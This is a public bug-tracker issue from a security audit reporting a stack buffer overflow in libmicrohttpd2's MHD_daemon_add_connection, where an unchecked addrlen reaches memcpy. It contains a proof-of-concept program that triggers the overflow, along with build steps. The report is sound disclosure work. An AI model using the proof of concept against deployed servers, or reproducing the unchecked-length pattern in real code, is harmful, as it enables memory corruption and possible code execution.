View Issue Details

Jump to NotesJump to History
IDProjectCategoryView StatusDate SubmittedLast Update
0010304libmicrohttpdinternal event looppublic2025-08-29 16:432025-08-29 16:43
Reporterarthurscchan Assigned To 
PrioritynormalSeverityminorReproducibilityalways
Status newResolutionopen 
Summary0010304: Possible Stack Buffer Overflow in libmicrohttpd2 daemon_add_conn.c
DescriptionThe vulnerability is located in the public function `MHD_daemon_add_connection` function in `src/mhd2/daemon_add_conn.c`.
This function’s documentation in `microhttpd2.h` explicitly states that it can be used directly by application developers:

> “Use this API in special cases, for example if your HTTP server is behind NAT and needs to connect out to the HTTP client, or if you are building a proxy.”

Because this API is explicitly exposed for direct use by applications, it must fail safely when given invalid arguments, even if those arguments come from application code rather than an HTTP client.

The vulnerable code is the following (https://git.gnunet.org/libmicrohttpd2.git/tree/src/mhd2/daemon_add_conn.c#n792):

```c
struct sockaddr_storage addrstorage;
/* ... */
if (0 < addrlen)
    memcpy(&addrstorage, addr, addrlen);
````

Although it does guard for 0 or negative addrlen, but when `addrlen` exceeds `sizeof(struct sockaddr_storage)`, `memcpy` will write beyond the end of `addrstorage`, corrupting stack memory. Passing a value larger than `sizeof(struct sockaddr_storage) + 1` is enough to trigger this overflow because there are no `addrlen` bound check exists in the function.

Although this vulnerability is triggered during **connection setup**, which is before any HTTP request parsing, it is still a serious memory safety issue. In typical use, where `libmicrohttpd2` handles its own `accept()` calls, the kernel ensures that `addrlen` is valid, so it is unlikely that a remote HTTP client could exploit this directly.

However, `MHD_daemon_add_connection()` is a **public API** documented for advanced scenarios such as NAT traversal or proxying, meaning developers may call it directly with arguments derived from untrusted input. If an application passes a crafted `addrlen`, this bug causes **stack corruption** that can result in crashes or remote code execution.
Steps To ReproduceThe following PoC deliberately triggers the bug by calling `MHD_daemon_add_connection()` with an `addrlen` set to `sizeof(struct sockaddr_storage) + 1` with minimal configurations.
The source buffer is correctly allocated to avoid read overflows, ensuring that the overflow occurs entirely in the destination stack buffer inside the function.
No valid socket setup or HTTP client data is needed to reproduce the bug, this confirms the vulnerability is because of the missing bound check of `addrlen` in the function’s implementation.

```cpp
#include <microhttpd2.h>
#include <sys/socket.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

static const struct MHD_Action* dummy_handler(void* cls, struct MHD_Request* req, const struct MHD_String* path, enum MHD_HTTP_Method method, uint_fast64_t upload_size) {
  return MHD_action_abort_request(req);
}

int main(void) {
  struct MHD_Daemon* daemon = MHD_daemon_create(&dummy_handler, NULL);
  MHD_daemon_start(daemon);

  int server_socket = socket(AF_INET, SOCK_STREAM, 0);
  int accepted_socket = accept(server_socket, NULL, NULL);

  size_t addrlen = sizeof(struct sockaddr_storage) + 1;
  unsigned char* buf = (unsigned char*) malloc(addrlen + 1);
  memset(buf, 0x41, addrlen + 1);

  MHD_daemon_add_connection(daemon, accepted_socket, addrlen, (const struct sockaddr*) buf, NULL);

  return 0;
}
```

## Build and run the poc

```
# Clone project
git clone https://git.gnunet.org/libmicrohttpd2.git mhd2
cd mhd2

# Build project
./autogen.sh
./configure --enable-dauth --enable-md5 --enable-sha256 --enable-sha512-256 \
  --enable-bauth --enable-upgrade --enable-https --enable-messages
ASAN_OPTIONS=detect_leaks=0 make -j$(nproc)
make install
BINARY=./src/mhd2/.libs/libmicrohttpd2.a

# Build poc
clang++ -fsanitize=address -stdlib=libc++ poc.cpp -I/src/mhd2/src/include ./src/mhd2/.libs/libmicrohttpd2.a -lgnutls -o poc

# Run poc
./poc
```
Additional InformationFound during the ongoing security audit carried out by Ada Logics and facilitated by OSTIF in the libmicrohttpd2 project.
TagsNo tags attached.

Activities

There are no notes attached to this issue.

Issue History

Date Modified Username Field Change
2025-08-29 16:43 arthurscchan New Issue